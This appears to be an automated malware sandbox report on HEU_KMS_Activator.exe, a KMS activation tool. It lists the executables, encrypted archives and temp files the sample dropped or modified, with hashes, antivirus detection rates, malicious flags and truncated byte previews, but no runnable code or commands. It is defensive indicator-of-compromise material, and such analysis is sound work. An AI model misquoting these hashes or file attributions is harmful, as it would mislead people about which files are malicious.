Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......$..Z`...`...`...;...o...;........X[.f...2...x...2...%...2...C...;...x...;...b...........;...E...`...P.......p.....c.a...`...a.......a...Rich`...................PE..L....e._.....................X.......H............@.................................Wo....@..................................]..,.......h...............P.......pU...C..T....................D......hC..@...............l............................text...<........................... ..`.rdata..............................@..@.data....'...p.......X..............@....rsrc...h............d..............@..@.reloc..pU.......V...n..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Event Viewer\wuhost.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):774992
Entropy (8bit):6.6562066905129385
Encrypted:false
SSDEEP:12288:SfT+l3f1HiVkn/RyWZyh+RUFUjImQdqS4DtcQqvRWqyZrJ67GfsyZVpUEJDv0NYw:SfW3NHiKnSlwIFYS4DtcQqpYT7VpHlJq
MD5:340349A5D4BA3E18CAAFE565C0296AC4
SHA1:6223224A0AA34A40D6ED6EF1200CEEF4FA19E5BF
SHA-256:FA824EC8B18DBE36318FF03E7FBF974BD6C8A6256F3449D4BF77082355553445
SHA-512:6261AE41E89469FB1590FC216E45EEC2C21723E81E8B3A984998B34BEBA8C81877E36AC694D6CB903AEC02EC022BC07F5578DD89F68ADE1D8661187172D0BBFC
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 83%
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........VS..7=_.7=_.7=_._>^.7=_._8^87=_c.._.7=_._>^.7=_ji8^.7=_._8^.7=_._9^.7=_._9^.7=_._;^.7=_._<^.7=_.7<_.6=_g^9^.7=_g^8^.7=_g^4^.7=_g^._.7=_.7._.7=_g^?^.7=_Rich.7=_........PE..L....%._.................>..........e........P....@.................................Su....@..................................>..........................P........e..0...p...................@...........@............P...............................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....#...`.......D..............@....rsrc................V..............@..@.reloc...e.......f...Z..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:data
Category:dropped
Size (bytes):49120
Entropy (8bit):0.0017331682157558962
Encrypted:false
SSDEEP:3:Ztt:T
MD5:0392ADA071EB68355BED625D8F9695F3
SHA1:777253141235B6C6AC92E17E297A1482E82252CC
SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
Malicious:false
Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5054976
Entropy (8bit):7.916798998306011
Encrypted:false
SSDEEP:98304:R8sjkqfcfKquIxKbcC+Ad44X8AFp5IbW7zLulUqp/6X0A2UU:3jgfXuIQb7+5A8AFp6bMKUy/zUU
MD5:7CD8B711BE93FF8858B7DC753C4065CA
SHA1:358EAD5466FD6F67545CD77D87D541235449558F
SHA-256:4159BA56C793D9A4EA76A1F364534E9AF97BA28E750104697C10D6D97F6C2CFA
SHA-512:99A03912DE71E832DE24F16F225C38325AD4D5358F31286FE9E27E8FACE8590AAC2AC29ABE3D49833154E02EF4612E6DCF6444D7E397BAEAE3D43D9E6FF6B897
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 66%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...=pY].........."..........@D.....J.............@...........................M......OM...@...@.......@.....................L...|....p....@...................M.0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc.....@..p....@.................@..@.reloc..0q....M..r....L.............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe

Download File
Process:C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):921936
Entropy (8bit):6.5211606037200776
Encrypted:false
SSDEEP:24576:l4dtfxkWTy0xymlC80KNWxDqnYHSVLR+sAsx:2TyKaAGqnYHS/+sAsx
MD5:1474BD3EDA2E087560754241A0B92991
SHA1:E1E66D856800DBB5EF5BF9C8E937B6514B9F02D7
SHA-256:C83E6B96EE3AA1A580157547EAE88D112D2202D710218F2ED496F7FE3D861ABC
SHA-512:CA2CBC155CEF666C46E6E4C07CC2E9A61BD15CEF8F8F1902D06C6178A1968487FC2AD78E018621A09836755C524215AA9FCB6E62D52B210DEEC10162EDCC9B7F
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 87%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.kRo...o...o...4...}...4.......4...n....6..i...=...u...=...#...=...L...4...w...........4...x...o...........a.......n.......n...Richo...........PE..L......^.................p........................@..........................@.......-....@.............................................................P.......(l..p|..p....................}.......|..@............................................text....o.......p.................. ..`.rdata...B.......D...t..............@..@.data...............................@....rsrc...............................@..@.reloc..(l.......n..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):921936
Entropy (8bit):6.5211606037200776
Encrypted:false
SSDEEP:24576:l4dtfxkWTy0xymlC80KNWxDqnYHSVLR+sAsx:2TyKaAGqnYHS/+sAsx
MD5:1474BD3EDA2E087560754241A0B92991
SHA1:E1E66D856800DBB5EF5BF9C8E937B6514B9F02D7
SHA-256:C83E6B96EE3AA1A580157547EAE88D112D2202D710218F2ED496F7FE3D861ABC
SHA-512:CA2CBC155CEF666C46E6E4C07CC2E9A61BD15CEF8F8F1902D06C6178A1968487FC2AD78E018621A09836755C524215AA9FCB6E62D52B210DEEC10162EDCC9B7F
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 87%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.kRo...o...o...4...}...4.......4...n....6..i...=...u...=...#...=...L...4...w...........4...x...o...........a.......n.......n...Richo...........PE..L......^.................p........................@..........................@.......-....@.............................................................P.......(l..p|..p....................}.......|..@............................................text....o.......p.................. ..`.rdata...B.......D...t..............@..@.data...............................@....rsrc...............................@..@.reloc..(l.......n..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autBFC6.tmp

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:GIF image data, version 89a, 273 x 273
Category:dropped
Size (bytes):97281
Entropy (8bit):7.82329967382233
Encrypted:false
SSDEEP:1536:O1l8tBhsJe/wPTWxjzm70L/QulTl4UmSjbDXf9bgr5Dm:Ov8uYGT4jqC/5diuXDX165q
MD5:95CCF61C6AB8C98CD9C6F33AB8D4108F
SHA1:4CDA9E213DA3B4D8C87D3C4FCE103544E0FBCD6A
SHA-256:E91A4F80813094EF53A0408D91679E7757E4F71C4ACC9E942E8ACA630BE0DF45
SHA-512:62851F1C1EC3DB6F3382E5C376B8C69C05EA223983A4929E676A5524767465DE42EE75D3E78730750DFE8E231E937CCFA4242A937D14012B581F2F6EE5353370
Malicious:false
Preview:GIF89a.......ua.......{i.`HvlV....xf...........q..............................wd......yf..........p[......~l....~|.............jT~..........n.hR}_GugQ|............~.........................................ta.......................bKx..........nY..........dMy.......{.........|.fO{bJw...eNz.......y.r]......................gP{....................t..........s.....................t.......................|i....yg.....q..........................................oZ...............us....q\.....}............s_........n............................w........xd.........................y.............q.......zg........cLx.................................................................~k....{..r.........om.pn........................^Ft...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="ht

C:\Users\user\AppData\Local\Temp\autC8A0.tmp

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):1807018
Entropy (8bit):7.999894560057019
Encrypted:true
SSDEEP:49152:AvAFxpIyAuLjnXQsP2snIbrYpnvnjo8yOgICCvi:AvAFLIGLz5PtnIfYFnjoG0
MD5:E95E0A57CAF3E24C190CD303AABABA7A
SHA1:25C8A267FE760BAF9B638D39AF73806034B6B3E8
SHA-256:CE54BD0CA93B73BBBFC2AFBB2C6F7159D83A3A5CAEB92146D850765A1B6A9DA0
SHA-512:033E112700C8C2BB4E4D68852AD959608B7BE4FA46FABDE41C05FFEA69982A8F440684AA93F0A686D65FE5E4394B7D5D3DFD1924D44B2ABBF6DA0256B9B49E9C
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Preview:7z..'...>...f.......$.........&......]........s...O.u....S8..u.+.w......".w...4. b......A`...5T-5.5..2.........K'......p!.......h.I.I....K..y~.s..o....._M........s.M4..GqcP..a.\..].4l.{.H..{...(+.......7>8p....j.9j..J..:.8F..c.4y3...vP.].V(p....R=.M,4.X.-..h.^...3.H..Kn..xO.&..|..P.u....q8..hRt..._..hE.o...c5..hw...l.I......n,H...A......J...p*..$.0..'.V...1)..[w.Rkk...n`.]3o.g...E.Q...E.Ugff.%...t.x...{...;.D.W.,.V[..@..Y.?h(...5..>&VNp..T.> .2...K?...A.....%.|P6.Ekyv.`..@F....T...F...7...I....b... .w?....J..... .`a.........j.>.-...w.d.4\.'a............l.0g.Sh...]..dh<..3.4a.nT../]v..3C.p-,..ih.|.J...`o..v.....z....Y...+.(..Sb..a.\M1....C9+\....GL.._.'.,a..Vo..G...1U... d|...G.]....V*......E{+.J.M..."..\-..J.I.K...Isgx.?.. `...W3...B=.n..`.....w.la.5.m".2.........`@..L.....n......G.&...d.d.=.dLT.5:S*U |*.....a..#.b^|.S..1.O.....7{.l..'HB%..0e.s.~U....x...W%U...9wO.O..ZKG..:.~V_.....8.....*..y.p...%...J@.......u...........~}R.T.4.w.W.}..A

C:\Users\user\AppData\Local\Temp\autC9AB.tmp

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):862741
Entropy (8bit):7.999021184950542
Encrypted:true
SSDEEP:24576:c2/RWRiVf6KUw/KacmqZooybsSViudCbEio:cZiUKzEZAsSzaS
MD5:F7229B58B678638D30DE2AA2E2B23D08
SHA1:37C374C09921C968853D220A3288E087F3DBB0AF
SHA-256:25E1EE2D65C00543E5855299CE396F52C411D8E8E49A8FAB4D90A2B21E65711C
SHA-512:2DC4BAE503EFD6A1E56C09431524AB9207E1A63AAF4E63A912A389F3831895E3794AC1F632EB353036AA477521DFFFC6F0FF78CA79938F29FAB68FEA9625C4F3
Malicious:false
Preview:7z..'....L...)......$............eC..].&..p.........../D.|.../._..z.-~A..\..*~kHy54......<.....=......6......! o..- 6Y..x..iC.#.@.LN....U...........%...[@...../.4.$...._......F;s%.P.|F.C..y@.."...H..jau..C....i..o.<D..[r.9y9.W..4......k..oNG..?X...q.r....g.QaZ...6..=%... ..).z..[.......fUx...mY-0.U.;6.....4..K.N...a...6...L...........[]v..e.i....r.T;.....c.R0..D.X_...a.:......2.r.E.!.....c.....!....U........4.............aIn...(.c.Z.6....:s...*...o...s.^).....D...#..%.].<C....G.<3.;.W.2..je.k.....]b.Q.|.C.B.qw.I.......=..|U..s......PH..u.{...FM..X..8....T/.E[...p..g.9......;.4.k.U..........Y5.^.0E..0'..yr..20{N.)...9E...._...:{..PL..).a.......B.|....b.i}9L..c..*..Fh.....>. ..$k.).a..e.}......../.....H5.$\r...O.y.[...}....P.!A.T}.l.A..>m.:....)Z*..2.3(..3.....l.p..%L7K......L.i[...4O.....{$..A.^.'.....BP....#.D...'.C.\..xx}..>O..T..9..2......{.........J.2..(..~J..X..W............0...kkR.-.t3q.h.4.d.....4..zY...l~l...N....B........K..j..0.I.O

C:\Users\user\AppData\Local\Temp\autCA48.tmp

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):515101
Entropy (8bit):7.999632298329647
Encrypted:true
SSDEEP:12288:hiUueKswiHeFY4aND7fBUNJA88M4n44EZVcHv5IoeOs9iX76vMHao:D5wE4a1W488MB9Z4BI9O76v9o
MD5:10A8C081F96DC74DACA5F0BA91045B36
SHA1:F7B32E796ABE8A806F40148F2E67EA8DC09F9490
SHA-256:1E1B06B1BDA8D90232F1B96C116603001C9F56EBCF28F2790533B5825BC475DD
SHA-512:7164F5BBFD6959E1D1D2809DCD42E46499DDD680FA9C8E521E88ECDFDBCFCE49C834580FEBC775785C9431EE87063A4909034C4B474FFECEB53C8C84B1775BCF
Malicious:false
Preview:7z..'...4~..........%.........-..3..]......,..B..:(.ZgL.1.E.M..a.....k..".C.]...r.oKq.o.b....E./.b.1ge......+.Q/T......O.z...R.r......{.....i ..].{...w...MyCfo ...$.<!.... .zq...)....h..s.J..O..}... ...9......Z.R#.Wq.......&1&.Tk.=.j.....,&.*..<.uz.Bh.2/W..d...B.|..Q.._D.V.f.q...RC..a..h..8...,....q..&~........m..k:,...;...*..i4.....S#.m+.s.I..o.az..I.b....;..+.....<.....Q.....eTs/..`..h.4.....8...........iIk.?.k.......n.i.....A.......e.dA=...T9.{...."P..J.w?e...a.g..D..x..e....Sa...X.0Z;Q..Q..K}...=.)&....b.[..$Xfw.=;...%.P.k....v.....+..?h..4pU.>.(e..L.S.x..F..3.PY.$..@.,d...5@.X.....aB... ........nt...yyC..w.h.l.......BM.._.....5..2....7...>.....i.....X6`....m[.Z.H$%..pS.)..8..f^..r".9....l.....r~.....)......6r.{...&G.........H......~.....}.YT..i.H....1.&5..n...'..K..3.)|J|>|.av.a....`xqv....1p]............U..s.G.<."..p|....QD6..'.._E(.h..H...L...i.}..m..r..........N..............t..49..........'Cj"....P.........O..V:\WHi....#G.S

C:\Users\user\AppData\Local\Temp\autCB34.tmp

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):475105
Entropy (8bit):7.999623658383902
Encrypted:true
SSDEEP:12288:0BdMAMRRQzWvIyoCnF7EhprE88oWL3cdtbaDB0M714PuMOmIACEh1cdu:SdpMPY2JF7En8fMzqb4PuM7IyMu
MD5:9AE06E4DB00F08CD6A1F77FDCC645427
SHA1:376C01217ABB3D8D4F72DE4FDED8DCF2C0CB4367
SHA-256:BABBA1B9FB634D804CD66944A3E97EB4BE36AB34AC56C05D007014EC73E9386E
SHA-512:457E01C333CEFF74830B7B021D782F363CA751831BAA066D9D5AFCF9F2D389580178EE18DC052D1855C413FA7A05BC68BBE74D1F0D4DA620BA5D84AFB4E55511
Malicious:false
Preview:7z..'.....z..?......%.......0.f-..5..].w......3.a`.....f...'D.$.."8..S..D...w...g...*..m.D.?....N.8.K..e....n9Q........>.....Z....B.t..0....Dx-...8x.E..V.l...a....{Zu7.U?..@w..S..H.^..aW.[.`be.C?.*8.....?....B<..p.t....H.!.I..49.]..(....4#.c...{.m`:vSB.f(..f...)f..8...7}.w...R.A)t. _i.D...0...MRFJ......R...i..?Sa...S.\..<...K.b...&d.O.4.V.=..t.x...J..(>..w...X.L..A;@..|..[...`(.j}.}.7...M.p..n?..X....@.....].........q.........q'.ld._...{./u;...H.......c~79v..jr=.z........dI:?.....(........S...~.h..f.>L...Y......9.f.&d..G..S.F%.....g........1..R...7/....,.=J.}.f...?.v..D..T..3.Q.5*..`b..us0<h....= ...W...P.`$XI......$.=...E.a.Z.hlv...=/LbB.5...Vo.........0..r..}@.}..%YV1<.7y.L.).FR....U.S.h.q...^..:h.....o.VY...g;.'.Qp.n.O.c...gP..._...]G.\?0.n.$z..WC...1.'.T:./..w....9..I......[e....q.s4S....D_../0"`.X.z.(-~.X.u.g...Q.9...W..-"..A..}.W..O..G...=..?Cg.o9F.8....Sj$b/8..}.5t......<...n.U0..\.Kh.........u..V./!p..IRy(......Pp.7..N..Uu.m8.Y*.l.(.

C:\Users\user\AppData\Local\Temp\autCBC1.tmp

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:data
Category:dropped
Size (bytes):339052
Entropy (8bit):7.768607938890595
Encrypted:false
SSDEEP:6144:/zeZFuAYH6DdYuB9UO3HpNOe5xGCvfVTGCMRX4zBcof7ep+IcZqTPkakEwWkt:VH6BLjF7txGKfRGCMWzBcKBI2qPk+w7t
MD5:61DD537B79E9960A1075FF73CB4419EC
SHA1:6FCBF8E7E7D3850C76B90B95F014799A17ABBE6B
SHA-256:D6C0234C05D4A8CD32005E0BFBA409C32C57CA3EA271A097AF16326362F660A5
SHA-512:4EE5810DFBCDB8BE118A0E710F72575BD6CA50358CFC4B43B717C9CCF90423EF7B4E995783B8D6B1273AD427552268E3891DAA367F216A6FFC0E34F4BFAC3BBE
Malicious:false
Preview:EA06.........................Z..F@.~...!......'.!.@i...R.i....+}..a..,v.u..t.X...... ...J}NAm..,..l6.$.D..#r.Nn....&.V..v..n..(... ......A..P.3..J;....7...|.AE.8@.....@c ......].@..J.c.., ...B...S 0X.....k....ap.4..... ...<S9...@.$.A.E.....L1..8.........A.).........\.. ....!..J `-......PT @..l..e.]....6..#.....I.. .....d.., .g..S....A....|.!..\.O.....P. ..`.A....||.u...U.5..H.%....|P ...s.X....K ........?.....5|_..._0....q..@0.....$.@......$.b.....I..H?.hg.........I(..1..EG.O.T......Y.L....".U..0~.eN...U.4....@.......Ug.e.A...o.P.A.^.`....z6.h..9....._k.u.z2.p.........MT.`.T..:....^.b..o.......H......#..l".H.b.."...D+..b)[....F..bcj..M...1...&...{.../..E.]ax;/.........9.......6..P......R.z:..4....r.AS.U..+T+..ci.....l.......@*.?DwG..ch....2..`...........H ..Y.Vn.@..P.G....f.^...P,]..V..`....1M.Z..>...... .......b..&........_;.u....DH.........@*....h.P..._..t.E...D4..Pj.j..W.m5@...>.,..&......A... ..&,.(.b....,.......W..... ............P....6........u

C:\Users\user\AppData\Local\Temp\nsjB6CE.tmp

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:data
Category:dropped
Size (bytes):8706939
Entropy (8bit):7.533667839644912
Encrypted:false
SSDEEP:196608:4wueFjgfXuIQb7+5A8AFp6bMKUy/zUUMu2Z3Sr:P2X2Z8yp6bMKUyLMu2Z3I
MD5:87C198415B33014577322AB1BDCA2DA3
SHA1:2EA7D74927F55D977C6A6747A40D1E256BDB8E32
SHA-256:D3EF7D8859FE916AB43FC1D9B6C0173E0F5DEC4ECEAAD6E00B0B2D11F95DFDD1
SHA-512:A855D265771FE5945D6D5D4BED2CD30F607ED56FC915D27288057243640C484E3C74000FC042696460FA622C70CA576800B4062963E32F225DE3AED90486525E
Malicious:false
Preview:.0......,.......,.......D!..Z....+......./.......0..................................................................................................................................................................................................................................................................................#!..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsoB6EE.tmp\System.dll

Download File
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11264
Entropy (8bit):5.567124464313517
Encrypted:false
SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
MD5:00A0194C20EE912257DF53BFE258EE4A
SHA1:D7B4E319BC5119024690DC8230B9CC919B1B86B2
SHA-256:DC4DA2CCADB11099076926B02764B2B44AD8F97CD32337421A4CC21A3F5448F3
SHA-512:3B38A2C17996C3B77EBF7B858A6C37415615E756792132878D8EDDBD13CB06710B7DA0E8B58104768F8E475FC93E8B44B3B1AB6F70DDF52EDEE111AAF5EF5667
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L.....*J...........!................0).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text...1........................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\time.txt

Download File
Process:C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):21
Entropy (8bit):3.403989446485262
Encrypted:false
SSDEEP:3:tRytG2v:sG2v
MD5:CB4BB3086383DD9AEFEB1763052734B6
SHA1:A4080CFB3930EDC39D7DF9C78F094AF4EE8E6DC2
SHA-256:54B01DB41FE23B8CF69BC767E00840BC2F6F3AF0595E6EE9F2EE2BC07A77D769
SHA-512:829BCEE57D6FC3961EBEED6264244F9BBCF36E9D13CA8DAACFABA1D8F08FA06D0034FCA2269C84BAE006F91F3D33139FF53EF8A8C940591A50D667B059C4A3B9
Malicious:false
Preview:2024-07-24 21:33:53..

C:\Users\user\AppData\Local\Temp\~DF00AC70994FC7CE8D.TMP

Download File
Process:C:\Windows\_temp07242019502489\kms_x64.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):19310
Entropy (8bit):6.652783140940435
Encrypted:false
SSDEEP:384:SL8JSc9yWPiuL8JSc9EvnypCSClikYNg703Vieip+4/CC:Xb9yWPSb9EvypPkYyMVEz
MD5:25EF64A9EEE6BCE8E239CB1EF81DBFDC
SHA1:6C2373A9F4EDCFD2845FEA091B0261EA079CAABC
SHA-256:539E3818F923B698FACEBC6CA6292E106175C103F7927BFB547848CA65882041
SHA-512:873FF6B85D48EE2B6814441DDC2E05564699091E8B68C7A5D01C8379D031277946E4C9E460CCE683679EB489B8B8E17F5E0D8280EB09F5C8018596957E834FE1
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF76B08DA2452CAB7.TMP

Download File
Process:C:\Windows\_temp07242019502489\kms_x64.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):30225
Entropy (8bit):7.121515753058385
Encrypted:false
SSDEEP:384:RaYNg7ZJEisYNg7ZJFnqR3lYNg70TX0QS8WnS+O3EYiffPizJkOg:RaYyfEXYyfFsYyZQS3STEXfHizJkOg
MD5:AFFAAD632469D6C91D540548B101C4A1
SHA1:BB76D280109387339A77325B994255FE331A4AB1
SHA-256:F856BBC0802578FB83EEFBFE3AB54407BD15D5CA8AEB0ECCF382F62D9B04A040
SHA-512:37C15E23DA55F6D93CEC5858EA07FAF32094966C861893514CCD7938F02F73241D019E1B5158B7619064C5440F463F7574F0E6C2117F0E1DD0187E5AE6F527F1
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\HeuKmsRenewal\HEU_KMS_Activator.exe

Download File
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):5054976
Entropy (8bit):7.916798998306011
Encrypted:false
SSDEEP:98304:R8sjkqfcfKquIxKbcC+Ad44X8AFp5IbW7zLulUqp/6X0A2UU:3jgfXuIQb7+5A8AFp6bMKUy/zUU
MD5:7CD8B711BE93FF8858B7DC753C4065CA
SHA1:358EAD5466FD6F67545CD77D87D541235449558F
SHA-256:4159BA56C793D9A4EA76A1F364534E9AF97BA28E750104697C10D6D97F6C2CFA
SHA-512:99A03912DE71E832DE24F16F225C38325AD4D5358F31286FE9E27E8FACE8590AAC2AC29ABE3D49833154E02EF4612E6DCF6444D7E397BAEAE3D43D9E6FF6B897
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 66%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...=pY].........."..........@D.....J.............@...........................M......OM...@...@.......@.....................L...|....p....@...................M.0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc.....@..p....@.................@..@.reloc..0q....M..r....L.............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\ScriptTemp.ini

Download File
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):36
Entropy (8bit):4.17619062614183
Encrypted:false
SSDEEP:3:IpBt/SBXVULYc:agXul
MD5:3A8C91238F157058E6E797878AEAA998
SHA1:A5A0DF200D397BFC92A3BA715EA911F942CF5FA6
SHA-256:8DA498514E563D6667F4A5F16C4CAE5635B6A5713FE7FA41AE91EAF5A9247384
SHA-512:5380AA1B6FACFC9E2364DDBFCC5113EE92EB1D582C1420055B3CDA6673EBDD98056443F47CEC395B4452B8F474C0E3E8D7CEE13DF87980C26B452BEA3ED4118A
Malicious:false
Preview:[Temp] ..Temp=_temp07242019502489 ..

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):2464
Entropy (8bit):3.245481458258006
Encrypted:false
SSDEEP:24:QOaqdmuF3rlg3+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPV3:FaqdF7a3+AAHdKoqKFxcxkFYt
MD5:A5EA57C079724F574E163A3284599D1F
SHA1:A2C65D683450CD01BD07CE76AA96A2FCE7B32FD6
SHA-256:3F96DD4D7231BC13AB2910BFA843702142A6EE0BFB07114E0EEFF047B43B338A
SHA-512:534E8FBE599A6760137C00A80791CE4B9D2D984C27FF98A032480F2C5E244F12B398F08F615483B89E89ACA1023C7FA81F23770A1116158740D2D8A7B6C74FF9
Malicious:false
Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. J.u.l. .. 2.4. .. 2.0.2.4. .2.0.:.2.0.:.5.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

